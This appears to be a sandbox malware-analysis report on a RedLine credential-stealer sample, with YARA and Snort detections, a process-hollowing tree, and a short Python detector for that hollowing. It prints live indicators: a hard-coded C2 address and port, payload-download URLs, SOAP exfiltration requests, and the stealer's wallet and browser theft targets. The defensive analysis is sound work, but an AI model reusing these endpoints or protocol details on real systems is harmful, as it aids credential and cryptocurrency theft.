
Windows Analysis Report
StZAEFSb2j.exe

Overview

General Information

Sample Name: StZAEFSb2j.exe
Analysis ID: 736967
MD5: c71616e2b7cedf9fc8e2ca6f6929abdf
SHA1: 896a4c41792c73db51074ccff5ef3f0577f510c5
SHA256: 4a9f8a3b847fa9d2e854d3a7235ddee8e4c093d04c3901f006d430be1060fae5
Tags: exe, RedLineStealer

Detection

RedLine
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Yara detected RedLine Stealer
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Antivirus detection for URL or domain
Snort IDS alert for network traffic
Writes to foreign memory regions
Tries to steal Crypto Currency Wallets
.NET source code references suspicious native API functions
Uses known network protocols on non-standard ports
Machine Learning detection for sample
Allocates memory in foreign processes
.NET source code contains potential unpacker
Injects a PE file into a foreign process
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Tries to harvest and steal browser information (history, passwords, etc.)
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Is looking for software installed on the system
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file name differs from the original file name in the version info
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Contains functionality to detect virtual machines (SLDT)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • StZAEFSb2j.exe (PID: 780 cmdline: C:\Users\user\Desktop\StZAEFSb2j.exe MD5: C71616E2B7CEDF9FC8E2CA6F6929ABDF)
    • aspnet_compiler.exe (PID: 1592 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe MD5: 17CC69238395DF61AAF483BCEF02E7C9)
      • conhost.exe (PID: 6120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

Malware Configuration (RedLine): {"C2 url": ["194.55.186.201:6008"], "Bot Id": "xxxPROFxxx"}
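The process tree above is the host-side picture of the injection signatures further up the report ("Creates a process in suspended mode", "Allocates memory in foreign processes", "Injects a PE file"): the sample on the user's Desktop starts aspnet_compiler.exe from the .NET framework directory with no arguments at all, which is the classic hollowing host for a .NET stealer loader. The following is an added example, not Joe Sandbox's own logic: it parses the report's process-tree lines as written above and flags a .NET framework utility launched bare by a program living in a user-writable directory. The target names other than aspnet_compiler.exe, the user-writable directory list, and the second (benign) tree are the author's assumptions and are constructed.

```python
"""Spot process-hollowing candidates in a sandbox process tree.

Added example, not Joe Sandbox's code. REPORT_TREE is the process list from this
report; BENIGN_TREE is constructed. The target list beyond aspnet_compiler.exe and
the user-writable directory names are the author's assumptions.
"""
from __future__ import annotations

import re
from dataclasses import dataclass
from pathlib import PureWindowsPath

REPORT_TREE = r"""
  • StZAEFSb2j.exe (PID: 780 cmdline: C:\Users\user\Desktop\StZAEFSb2j.exe MD5: C71616E2B7CEDF9FC8E2CA6F6929ABDF)
    • aspnet_compiler.exe (PID: 1592 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe MD5: 17CC69238395DF61AAF483BCEF02E7C9)
      • conhost.exe (PID: 6120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
"""

# Constructed benign tree: a build tool in Program Files launching MSBuild with arguments.
BENIGN_TREE = r"""
  • devenv.exe (PID: 100 cmdline: C:\Program Files\Microsoft Visual Studio\devenv.exe MD5: 00000000000000000000000000000000)
    • MSBuild.exe (PID: 101 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe /nologo app.csproj MD5: 11111111111111111111111111111111)
"""

# .NET framework binaries used as hollowing hosts. aspnet_compiler.exe is the one in
# this report; the others are the author's additions (assumption).
DOTNET_HOLLOWING_TARGETS = {
    "aspnet_compiler.exe", "regasm.exe", "regsvcs.exe", "msbuild.exe",
    "installutil.exe", "applaunch.exe",
}
USER_WRITABLE_DIRS = {"desktop", "downloads", "appdata", "temp", "public"}  # assumption

LINE_RE = re.compile(
    r"^(?P<indent>\s*)• (?P<name>\S+) \(PID: (?P<pid>\d+) cmdline: (?P<cmd>.+?) MD5: (?P<md5>[0-9A-Fa-f]{32})\)\s*$"
)
CMD_RE = re.compile(r'^"?(?P<image>.+?\.exe)"?(?:\s+(?P<args>.*))?$', re.IGNORECASE)


@dataclass
class Proc:
    pid: int
    name: str
    image: str       # executable path split off the command line
    args: str        # remaining arguments ("" when launched bare)
    md5: str
    parent: int | None


def split_cmdline(cmd: str) -> tuple[str, str]:
    """Split a command line at the first '.exe'. Quoted paths are handled; a directory
    name that itself contains '.exe' would confuse this simple rule."""
    m = CMD_RE.match(cmd.strip())
    if not m:
        return cmd.strip(), ""
    return m.group("image"), (m.group("args") or "").strip()


def parse_process_tree(text: str) -> dict[int, Proc]:
    """Parse Joe Sandbox-style bullet lines; indentation depth gives the parent."""
    procs: dict[int, Proc] = {}
    stack: list[tuple[int, int]] = []  # (depth, pid) of the current ancestry
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        depth = len(m.group("indent"))
        while stack and stack[-1][0] >= depth:
            stack.pop()
        parent = stack[-1][1] if stack else None
        image, args = split_cmdline(m.group("cmd"))
        pid = int(m.group("pid"))
        procs[pid] = Proc(pid, m.group("name"), image, args, m.group("md5").lower(), parent)
        stack.append((depth, pid))
    return procs


def in_dotnet_framework_dir(image: str) -> bool:
    parts = [p.lower() for p in PureWindowsPath(image).parts]
    return "microsoft.net" in parts and any(p.startswith("framework") for p in parts)


def in_user_writable_dir(image: str) -> bool:
    parts = [p.lower() for p in PureWindowsPath(image).parts]
    return "users" in parts and any(p in USER_WRITABLE_DIRS for p in parts)


def hollowing_candidates(procs: dict[int, Proc]) -> list[tuple[int, int, str]]:
    """Return (parent_pid, child_pid, reason) for every framework utility started
    with no arguments by a program located in a user-writable directory."""
    hits = []
    for p in procs.values():
        parent = procs.get(p.parent) if p.parent is not None else None
        if parent is None:
            continue
        if (PureWindowsPath(p.image).name.lower() in DOTNET_HOLLOWING_TARGETS
                and in_dotnet_framework_dir(p.image)
                and p.args == ""
                and in_user_writable_dir(parent.image)):
            hits.append((parent.pid, p.pid, f"{p.name} launched bare by {parent.image}"))
    return hits


if __name__ == "__main__":
    for label, tree in (("report", REPORT_TREE), ("benign", BENIGN_TREE)):
        for parent_pid, child_pid, why in hollowing_candidates(parse_process_tree(tree)):
            print(f"[{label}] {parent_pid} -> {child_pid}: {why}")
```

Two design points. The conhost.exe child is deliberately not scored: aspnet_compiler.exe is a console utility, so a conhost.exe with the usual `0xffffffff -ForceV1` arguments under it is expected and says nothing about injection. And the rule keys on the combination (framework utility, no arguments, parent in a user-writable path) rather than on any one of those, because each alone is common in developer environments; the same three fields are available from Sysmon Event ID 1 (Image, CommandLine, ParentImage), so the check transfers directly to endpoint telemetry.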
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
dump.pcap | JoeSecurity_RedLine_1 | Yara detected RedLine Stealer | Joe Security |

Source | Rule | Description | Author | Strings
00000000.00000002.321721404.00000000042B9000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
00000000.00000002.321721404.00000000042B9000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000002.321721404.00000000042B9000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_RedLineStealer_f54632eb | unknown | unknown | see below
  • 0x535ca:$a4: get_ScannedWallets
  • 0x6b1ea:$a4: get_ScannedWallets
  • 0x52428:$a5: get_ScanTelegram
  • 0x6a048:$a5: get_ScanTelegram
  • 0x5324e:$a6: get_ScanGeckoBrowsersPaths
  • 0x6ae6e:$a6: get_ScanGeckoBrowsersPaths
  • 0x5106a:$a7: <Processes>k__BackingField
  • 0x68c8a:$a7: <Processes>k__BackingField
  • 0x4ef7c:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
  • 0x66b9c:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
  • 0x5099e:$a9: <ScanFTP>k__BackingField
  • 0x685be:$a9: <ScanFTP>k__BackingField
00000001.00000000.316565039.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
00000001.00000000.316565039.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
(8 further entries collapsed in the original report)

Source | Rule | Description | Author | Strings
0.2.StZAEFSb2j.exe.42f9000.5.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
0.2.StZAEFSb2j.exe.42f9000.5.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
0.2.StZAEFSb2j.exe.42f9000.5.unpack | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen | see below
  • 0xe68a:$u7: RunPE
  • 0x11d41:$u8: DownloadAndEx
  • 0x7330:$pat14: , CommandLine:
  • 0x11279:$v2_1: ListOfProcesses
  • 0xe88b:$v2_2: get_ScanVPN
  • 0xe92e:$v2_2: get_ScanFTP
  • 0xf61e:$v2_2: get_ScanDiscord
  • 0x1060c:$v2_2: get_ScanSteam
  • 0x10628:$v2_2: get_ScanTelegram
  • 0x106ce:$v2_2: get_ScanScreen
  • 0x11416:$v2_2: get_ScanChromeBrowsersPaths
  • 0x1144e:$v2_2: get_ScanGeckoBrowsersPaths
  • 0x11709:$v2_2: get_ScanBrowsers
  • 0x117ca:$v2_2: get_ScannedWallets
  • 0x117f0:$v2_2: get_ScanWallets
  • 0x11810:$v2_3: GetArguments
  • 0xfed9:$v2_4: VerifyUpdate
  • 0x147f6:$v2_4: VerifyUpdate
  • 0x11bca:$v2_5: VerifyScanRequest
  • 0x112c6:$v2_6: GetUpdates
  • 0x147d7:$v2_6: GetUpdates
0.2.StZAEFSb2j.exe.42f9000.5.unpack | Windows_Trojan_RedLineStealer_f54632eb | unknown | unknown | see below
  • 0x117ca:$a4: get_ScannedWallets
  • 0x10628:$a5: get_ScanTelegram
  • 0x1144e:$a6: get_ScanGeckoBrowsersPaths
  • 0xf26a:$a7: <Processes>k__BackingField
  • 0xd17c:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
  • 0xeb9e:$a9: <ScanFTP>k__BackingField
1.0.aspnet_compiler.exe.400000.0.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
(7 further entries collapsed in the original report)
                    No Sigma rule has matched
Timestamp | Source | Destination | Protocol | SID | Classtype
11/03/22-12:44:38.337914 | 192.168.2.4:56572 | 8.8.8.8:53 | UDP | 2012811 | Potentially Bad Traffic
11/03/22-12:44:39.556293 | 50.115.174.192:443 | 192.168.2.4:49695 | TCP | 2018856 | A Network Trojan was detected
11/03/22-12:44:40.820043 | 50.115.174.192:443 | 192.168.2.4:49696 | TCP | 2018856 | A Network Trojan was detected


                    AV Detection

Source: StZAEFSb2j.exe | ReversingLabs: Detection: 34%
Source: StZAEFSb2j.exe | Virustotal: Detection: 25%
Source: https://tgc8x.tk/tt/BLACKDEV.txt | Avira URL Cloud: Label: phishing
Source: https://tgc8x.tk/tt/lamb.txt | Avira URL Cloud: Label: phishing
Source: StZAEFSb2j.exe | Joe Sandbox ML: detected
Source: 00000000.00000002.321721404.00000000042B9000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: RedLine {"C2 url": ["194.55.186.201:6008"], "Bot Id": "xxxPROFxxx"}
Source: unknown | HTTPS traffic detected: 50.115.174.192:443 -> 192.168.2.4:49695 version: TLS 1.2
Source: StZAEFSb2j.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\BLACKDEVIL.pdbBSJB | source: StZAEFSb2j.exe, 00000000.00000002.322189785.0000000005000000.00000004.08000000.00040000.00000000.sdmp, StZAEFSb2j.exe, 00000000.00000002.321290507.0000000002C1B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\BLACKDEVIL.pdb | source: StZAEFSb2j.exe, 00000000.00000002.322189785.0000000005000000.00000004.08000000.00040000.00000000.sdmp, StZAEFSb2j.exe, 00000000.00000002.321290507.0000000002C1B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: XCBVNDDJD.pdb | source: StZAEFSb2j.exe
Source: C:\Users\user\Desktop\StZAEFSb2j.exe | Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h (6 identical entries in the report)

                    Networking

Source: Traffic | Snort IDS: 2018856 ET TROJAN Windows executable base64 encoded 50.115.174.192:443 -> 192.168.2.4:49695
Source: Traffic | Snort IDS: 2018856 ET TROJAN Windows executable base64 encoded 50.115.174.192:443 -> 192.168.2.4:49696
Source: Traffic | Snort IDS: 2012811 ET DNS Query to a .tk domain - Likely Hostile 192.168.2.4:56572 -> 8.8.8.8:53
Source: unknown | Network traffic detected: HTTP traffic on port 49697 -> 6008 (2 entries)
Source: unknown | Network traffic detected: HTTP traffic on port 6008 -> 49697 (4 entries)
Source: unknown | Network traffic detected: HTTP traffic on port 49699 -> 6008
Source: unknown | Network traffic detected: HTTP traffic on port 6008 -> 49699 (2 entries)
Source: unknown | Network traffic detected: HTTP traffic on port 49700 -> 6008
Source: unknown | Network traffic detected: HTTP traffic on port 6008 -> 49700 (2 entries)
Source: Malware configuration extractor | URLs: 194.55.186.201:6008
Source: Joe Sandbox View | ASN Name: VIRPUS VIRPUS
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global traffic | HTTP traffic detected: GET /tt/lamb.txt HTTP/1.1 | Host: tgc8x.tk | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /tt/BLACKDEV.txt HTTP/1.1 | Host: tgc8x.tk
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: text/xml; charset=utf-8 | SOAPAction: "http://tempuri.org/Endpoint/CheckConnect" | Host: 194.55.186.201:6008 | Content-Length: 137 | Expect: 100-continue | Accept-Encoding: gzip, deflate | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: text/xml; charset=utf-8 | SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings" | Host: 194.55.186.201:6008 | Content-Length: 144 | Expect: 100-continue | Accept-Encoding: gzip, deflate
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: text/xml; charset=utf-8 | SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment" | Host: 194.55.186.201:6008 | Content-Length: 1129933 | Expect: 100-continue | Accept-Encoding: gzip, deflate
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: text/xml; charset=utf-8 | SOAPAction: "http://tempuri.org/Endpoint/GetUpdates" | Host: 194.55.186.201:6008 | Content-Length: 1129925 | Expect: 100-continue | Accept-Encoding: gzip, deflate | Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 50.115.174.192
Source: global traffic | TCP traffic: 192.168.2.4:49697 -> 194.55.186.201:6008
Source: unknown | Network traffic detected: HTTP traffic on port 49695 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49696
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49695
Source: unknown | Network traffic detected: HTTP traffic on port 49696 -> 443
Source: unknown | TCP traffic detected without corresponding DNS query: 194.55.186.201 (50 identical entries in the report; the C2 address is hard-coded in the configuration, so no name resolution precedes the connection)
Source: aspnet_compiler.exe, 00000001.00000002.416745991.00000000030DB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://194.55.186.201:
Source: aspnet_compiler.exe, 00000001.00000002.415787658.0000000002FF2000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://194.55.186.201:6008
Source: aspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://194.55.186.201:6008/
Source: aspnet_compiler.exe, 00000001.00000003.412663066.0000000008CB2000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000003.412625368.0000000008CB0000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000003.412575103.0000000008CB0000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000003.402236725.0000000008CA1000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000003.412702825.000000000152D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ns.adobe.c/g
Source: aspnet_compiler.exe, 00000001.00000002.416441450.000000000309B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.datacontract.org/2004/07/
Source: aspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: aspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: aspnet_compiler.exe, 00000001.00000002.415555604.0000000002FAF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/D
Source: aspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: aspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
Source: aspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: StZAEFSb2j.exe, 00000000.00000002.320164097.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: aspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/
Source: aspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/0
Source: aspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/CheckConnect
Source: aspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/CheckConnectResponse
Source: aspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettings
Source: aspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
Source: aspnet_compiler.exe, 00000001.00000002.415787658.0000000002FF2000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000002.415555604.0000000002FAF000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000002.415687042.0000000002FDA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
Source: aspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
Source: aspnet_compiler.exe, 00000001.00000002.416745991.00000000030DB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/SetEnviron
Source: aspnet_compiler.exe, 00000001.00000002.416745991.00000000030DB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/SetEnvironment
Source: aspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
Source: aspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
Source: aspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
Source: aspnet_compiler.exe, 00000001.00000002.415555604.0000000002FAF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/t_
Source: StZAEFSb2j.exe, 00000000.00000002.320604810.0000000002B5D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tgc8x.tk
Source: tmpE2D.tmp.1.dr | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: StZAEFSb2j.exe, 00000000.00000002.321721404.00000000042B9000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000000.316565039.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
Source: StZAEFSb2j.exe, 00000000.00000002.321721404.00000000042B9000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000000.316565039.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
Source: tmpE2D.tmp.1.dr | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: tmpE2D.tmp.1.dr | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: aspnet_compiler.exe, 00000001.00000003.399325054.00000000080B1000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000002.430638568.0000000004243000.00000004.00000800.00020000.00000000.sdmp, tmpB95.tmp.1.dr, tmpD30.tmp.1.dr, tmpC92.tmp.1.dr, tmpC33.tmp.1.dr, tmpCC2.tmp.1.dr, tmpDBF.tmp.1.dr, tmpBF4.tmp.1.dr, tmpEBC.tmp.1.dr, tmpE8C.tmp.1.dr, tmpF80C.tmp.1.dr, tmpD60.tmp.1.dr, tmpE2D.tmp.1.dr | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: tmpE2D.tmp.1.dr | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: StZAEFSb2j.exe, 00000000.00000002.321721404.00000000042B9000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000000.316565039.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://ipinfo.io/ip%appdata%
Source: aspnet_compiler.exe, 00000001.00000003.399325054.00000000080B1000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000002.430638568.0000000004243000.00000004.00000800.00020000.00000000.sdmp, tmpB95.tmp.1.dr, tmpD30.tmp.1.dr, tmpC92.tmp.1.dr, tmpC33.tmp.1.dr, tmpCC2.tmp.1.dr, tmpDBF.tmp.1.dr, tmpBF4.tmp.1.dr, tmpEBC.tmp.1.dr, tmpE8C.tmp.1.dr, tmpF80C.tmp.1.dr, tmpD60.tmp.1.dr, tmpE2D.tmp.1.dr | String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: aspnet_compiler.exe, 00000001.00000003.399325054.00000000080B1000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000002.430638568.0000000004243000.00000004.00000800.00020000.00000000.sdmp, tmpB95.tmp.1.dr, tmpD30.tmp.1.dr, tmpC92.tmp.1.dr, tmpC33.tmp.1.dr, tmpCC2.tmp.1.dr, tmpDBF.tmp.1.dr, tmpBF4.tmp.1.dr, tmpEBC.tmp.1.dr, tmpE8C.tmp.1.dr, tmpF80C.tmp.1.dr, tmpD60.tmp.1.dr, tmpE2D.tmp.1.dr | String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
Source: aspnet_compiler.exe, 00000001.00000003.399325054.00000000080B1000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000002.430638568.0000000004243000.00000004.00000800.00020000.00000000.sdmp, tmpB95.tmp.1.dr, tmpD30.tmp.1.dr, tmpC92.tmp.1.dr, tmpC33.tmp.1.dr, tmpCC2.tmp.1.dr, tmpDBF.tmp.1.dr, tmpBF4.tmp.1.dr, tmpEBC.tmp.1.dr, tmpE8C.tmp.1.dr, tmpF80C.tmp.1.dr, tmpD60.tmp.1.dr, tmpE2D.tmp.1.dr | String found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
Source: aspnet_compiler.exe, 00000001.00000003.399325054.00000000080B1000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000002.430638568.0000000004243000.00000004.00000800.00020000.00000000.sdmp, tmpB95.tmp.1.dr, tmpD30.tmp.1.dr, tmpC92.tmp.1.dr, tmpC33.tmp.1.dr, tmpCC2.tmp.1.dr, tmpDBF.tmp.1.dr, tmpBF4.tmp.1.dr, tmpEBC.tmp.1.dr, tmpE8C.tmp.1.dr, tmpF80C.tmp.1.dr, tmpD60.tmp.1.dr, tmpE2D.tmp.1.dr | String found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
Source: StZAEFSb2j.exe, 00000000.00000002.320164097.0000000002B46000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://tgc8x.tk
Source: StZAEFSb2j.exe, 00000000.00000002.318741873.0000000002ACA000.00000004.00000800.00020000.00000000.sdmp, StZAEFSb2j.exe, 00000000.00000002.321171028.0000000002BC4000.00000004.00000800.00020000.00000000.sdmp, StZAEFSb2j.exe, 00000000.00000002.318500513.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://tgc8x.tk/tt/BLACKDEV.txt
Source: StZAEFSb2j.exe, 00000000.00000002.318741873.0000000002ACA000.00000004.00000800.00020000.00000000.sdmp, StZAEFSb2j.exe, 00000000.00000002.318500513.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, StZAEFSb2j.exe, 00000000.00000002.320164097.0000000002B46000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://tgc8x.tk/tt/lamb.txt
Source: StZAEFSb2j.exe, 00000000.00000002.320562361.0000000002B54000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://tgc8x.tk4
Source: StZAEFSb2j.exe, 00000000.00000002.321171028.0000000002BC4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://tgc8x.tkD8
Source: aspnet_compiler.exe, 00000001.00000003.399325054.00000000080B1000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000002.430638568.0000000004243000.00000004.00000800.00020000.00000000.sdmp, tmpB95.tmp.1.dr, tmpD30.tmp.1.dr, tmpC92.tmp.1.dr, tmpC33.tmp.1.dr, tmpCC2.tmp.1.dr, tmpDBF.tmp.1.dr, tmpBF4.tmp.1.dr, tmpEBC.tmp.1.dr, tmpE8C.tmp.1.dr, tmpF80C.tmp.1.dr, tmpD60.tmp.1.dr, tmpE2D.tmp.1.dr | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 194.55.186.201:6008Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                    Source: unknownDNS traffic detected: queries for: tgc8x.tk
                    Source: global trafficHTTP traffic detected: GET /tt/lamb.txt HTTP/1.1Host: tgc8x.tkConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /tt/BLACKDEV.txt HTTP/1.1Host: tgc8x.tk
                    Source: unknownHTTPS traffic detected: 50.115.174.192:443 -> 192.168.2.4:49695 version: TLS 1.2

                    System Summary

                    Source: 0.2.StZAEFSb2j.exe.42f9000.5.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 0.2.StZAEFSb2j.exe.42f9000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
